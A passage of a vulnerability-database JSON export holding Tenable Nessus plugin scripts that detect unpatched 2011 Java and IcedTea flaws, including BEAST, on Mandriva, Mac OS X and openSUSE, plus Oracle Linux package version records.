vectors (CVE-2011-3554).\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\nciphers in cipher-block chaining (CBC) mode. An attacker able to\nperform a chosen plain text attack against a connection mixing trusted\nand untrusted data could use this flaw to recover portions of the\ntrusted data sent over the connection (CVE-2011-3389).\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the\nfirst application data record byte to a separate SSL/TLS protocol\nrecord. This mitigation may cause compatibility issues with some\nSSL/TLS implementations and can be disabled using the\njsse.enableCBCProtection boolean property. This can be done on the\ncommand line by appending the flag -Djsse.enableCBCProtection=false to\nthe java command.\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start\napplications and untrusted Java applets to affect confidentiality via\nunknown vectors related to HotSpot (CVE-2011-3558).\n\nIcedTea6 prior to 1.10.4 allows remote attackers to affect\nconfidentiality, integrity, and availability, related to RMI\n(CVE-2011-3556).\n\nIcedTea6 prior to 1.10.4 allows remote attackers to affect\nconfidentiality, integrity, and availability, related to RMI\n(CVE-2011-3557).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start\napplications and untrusted Java applets to affect confidentiality and\nintegrity, related to JSSE (CVE-2011-3560).\n\nDeepak Bhole discovered a flaw in the Same Origin Policy (SOP)\nimplementation in the IcedTea project Web browser plugin. A malicious\napplet could use this flaw to bypass SOP protection and open\nconnections to any sub-domain of the second-level domain of the\napplet's origin, as well as any sub-domain of the domain that is the\nsuffix of the origin second-level domain. For example, IcedTea-Web\nplugin allowed applet from some.host.example.com to connect to\nother.host.example.com, www.example.com, and example.com, as well as\nwww.ample.com or ample.com. (CVE-2011-3377).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:icedtea-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"icedtea-web-1.0.6-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"java-1.6.0-openjdk-1.6.0.0-24.b22.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-24.b22.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-24.b22.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-24.b22.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-24.b22.1mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"icedtea-web-1.0.6-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"java-1.6.0-openjdk-1.6.0.0-24.b22.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-24.b22.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-24.b22.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-24.b22.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-24.b22.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:43:21", "references": ["https://www.imperialviolet.org/2011/09/23/chromeandbeast.html", "http://support.apple.com/kb/HT5045", "http://www.securityfocus.com/archive/1/520435/30/0/threaded", "https://www.openssl.org/~bodo/tls-cbc.txt"], "pluginID": "56749", "description": "The remote Mac OS X host is running a version of Java for Mac OS X 10.7 that is missing Update 1, which updates the Java version to 1.6.0_29. It is, therefore, affected by multiple security vulnerabilities, the most serious of which may allow an untrusted Java applet to execute arbitrary code with the privileges of the current user outside the Java sandbox.", "edition": 6, "reporter": "Tenable", "published": "2011-11-09T00:00:00", "title": "Mac OS X : Java for Mac OS X 10.7 Update 1 (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3549", "CVE-2011-3561", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3546", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3545", "CVE-2011-3552"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:apple:java_1.6"], "id": "MACOSX_JAVA_10_7_UPDATE1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56749", "sourceData": "#TRUSTED 7ae2bd1e0c6b0e6b9c75f2f0ac0806f10a1dfb0aae25c9f29cdc99e08449e6ce29cc440fb33a202710d07429be1340595e7ff39c8a6141c26fcd8609b807dce6bedd00e1c2826627b21fed534b2ec7d229c7490f1fe5630bd3fcf8a9114aeac1e356f4ab255e17cbec7259008917527da3b8be65451d8bc28efc388d4a36066c9736908495a5b60453d5f4c6897d9fedc5090ee0d579ee60e0ab6797dd36c544d36c728592f88e3c6fcff470792f21208eb627f4aa9ca74d0b820ac68df45a41f2bb8d251f5c6bc89a5aca491c23152f479c26c7ff1ff52e2bd8bd85973ecf27ca6f0f7a73b052f6d9a2c824a6dfc4effc57e9e04946c962a338dc574ba3165185e4efd4c24219f0f9a320f8733a34b81ee68270a1678f90c797327a7eeb1adecb00183da31770c26fd7840e515eeddd14764ffb4f710ff1256bea573ceb065797ad98070a5068e51daf15e2b6a9d436c54eec40d594ad587c53fd9a34ab3cb9802e56573b745e59ee4ab70b4ed8e8f3bac29ca96a19016dc7d980d554c64496cc0466de77de7ae15ba65b2052bcd320c77b102451430e403a5be7801e5e584c16753a14528dc0988cecdb3557b5fb114d4a45d65db8430793b4a264e8c4c987d9a02234eb3412acbd5b25db8d78f11cdad4c2a2005e61a32650c6065d9450d34f07b898091e1176070a5c246a3fdc0aac9e86be9a3565b730917e3ae5811f4e\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56749);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2011-3389\",\n \"CVE-2011-3521\",\n \"CVE-2011-3544\",\n \"CVE-2011-3545\",\n \"CVE-2011-3546\",\n \"CVE-2011-3547\",\n \"CVE-2011-3548\",\n \"CVE-2011-3549\",\n \"CVE-2011-3551\",\n \"CVE-2011-3552\",\n \"CVE-2011-3553\",\n \"CVE-2011-3554\",\n \"CVE-2011-3556\",\n \"CVE-2011-3557\",\n \"CVE-2011-3558\",\n \"CVE-2011-3560\",\n \"CVE-2011-3561\"\n );\n script_bugtraq_id(\n 49778,\n 50211,\n 50216,\n 50218,\n 50220,\n 50223,\n 50224,\n 50231,\n 50234,\n 50236,\n 50239,\n 50242,\n 50243,\n 50246,\n 50250\n );\n script_xref(name:\"EDB-ID\", value:\"18171\");\n script_xref(name:\"CERT\", value:\"864643\");\n\n script_name(english:\"Mac OS X : Java for Mac OS X 10.7 Update 1 (BEAST)\");\n script_summary(english:\"Checks the version of the JavaVM framework.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a version of Java installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host is running a version of Java for Mac OS X\n10.7 that is missing Update 1, which updates the Java version to\n1.6.0_29. It is, therefore, affected by multiple security\nvulnerabilities, the most serious of which may allow an untrusted Java\napplet to execute arbitrary code with the privileges of the current\nuser outside the Java sandbox.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT5045\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/520435/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2011/09/23/chromeandbeast.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/tls-cbc.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Java for Mac OS X 10.7 Update 1, which includes version\n14.1.0 of the JavaVM Framework.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Rhino Script Engine Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:java_1.6\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) exit(0, \"The host does not appear to be running Mac OS X.\");\nif (!ereg(pattern:\"Mac OS X 10\\.7([^0-9]|$)\", string:os))\n exit(0, \"The host is running \"+os+\" and therefore is not affected.\");\n\ncmd = 'ls /System/Library/Java';\nls = exec_cmd(cmd:cmd);\nif ( 'JavaVirtualMachines' >!< ls ) exit(0, \"Java is not installed on the remote host\");\n\nplist = \"/System/Library/Frameworks/JavaVM.framework/Versions/A/Resources/version.plist\";\ncmd =\n 'plutil -convert xml1 -o - \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleVersion | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\$.*\\\$<\\\\/string>.*/\\\\1/g\\'';\nversion = exec_cmd(cmd:cmd);\nif (!strlen(version)) exit(1, \"Failed to get the version of the JavaVM Framework.\");\n\nversion = chomp(version);\nif (!ereg(pattern:\"^[0-9]+\\.\", string:version)) exit(1, \"The JavaVM Framework version does not appear to be numeric (\"+version+\").\");\n\nfixed_version = \"14.1.0\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Framework : JavaVM' +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X 10.7 and has JavaVM Framework version \"+version+\".\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:04:31", "references": ["http://www.nessus.org/u?3fed43a3", "https://bugzilla.novell.com/show_bug.cgi?id=725167"], "pluginID": "75874", "description": "Oracle/Sun Java 1.6.0 was updated to the u26 release, fixing lots of bugs and security issues.\n\nPlease see http://www.oracle.com/technetwork/topics/security/javacpuoct2011-44343 1.html\n\nfor more details.", "edition": 5, "reporter": "Tenable", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-5320) (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3549", "CVE-2011-3561", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3516", "CVE-2011-3558", "CVE-2011-3555", "CVE-2011-3546", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3545", "CVE-2011-3552", "CVE-2011-3550"], "modified": "2017-06-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_11_4_JAVA-1_6_0-SUN-111024.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75874", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-5320.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75874);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2017/06/05 16:07:23 $\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3516\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3545\", \"CVE-2011-3546\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3549\", \"CVE-2011-3550\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3555\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\", \"CVE-2011-3560\", \"CVE-2011-3561\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-5320) (BEAST)\");\n script_summary(english:\"Check for the java-1_6_0-sun-5320 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Oracle/Sun Java 1.6.0 was updated to the u26 release, fixing lots of\nbugs and security issues.\n\nPlease see\nhttp://www.oracle.com/technetwork/topics/security/javacpuoct2011-44343\n1.html\n\nfor more details.\"\n );\n # http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3fed43a3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=725167\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"java-1_6_0-sun-1.6.0.u29-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"java-1_6_0-sun-alsa-1.6.0.u29-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"java-1_6_0-sun-demo-1.6.0.u29-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"java-1_6_0-sun-devel-1.6.0.u29-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u29-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"java-1_6_0-sun-plugin-1.6.0.u29-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"java-1_6_0-sun-src-1.6.0.u29-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:37:52", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "packageName": "java-1.6.0-openjdk-demo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.0.1.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "packageName": "java-1.6.0-openjdk-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "i386", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.0.1.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "packageName": "java-1.6.0-openjdk-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "src", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1.src.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "src", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.40.1.9.10.el6_1.src.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "i386", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.0.1.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk-src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.0.1.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk-src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.9.10.el6_1.x86_64.rpm", "packageName": "java-1.6.0-openjdk-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.0.1.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "x86_64", "packageFilename": "java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.0.1.el5_7.x86_64.rpm", "packageName": "java-1.6.0-openjdk-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.6.0.0-1.40.1.9.10.el6_1", "arch": "i686", "packageFilename": "java-1.6.0-openjdk-src-1.6.0.0-1.40.1.9.10.el6_1.i686.rpm", "packageName": "java-1.6.0-openjdk-src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "i386", "packageFilename": "java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.0.1.el5_7.i386.rpm", "packageName": "java-1.6.0-openjdk-demo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "src", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.0.1.el5_7.src.rpm", "packageName": "java-1.6.0-openjdk", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.6.0.0-1.23.1.9.10.0.1.el5_7", "arch": "src", "packageFilename": "java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.0.1.el5_7.src.rpm", "packageName": 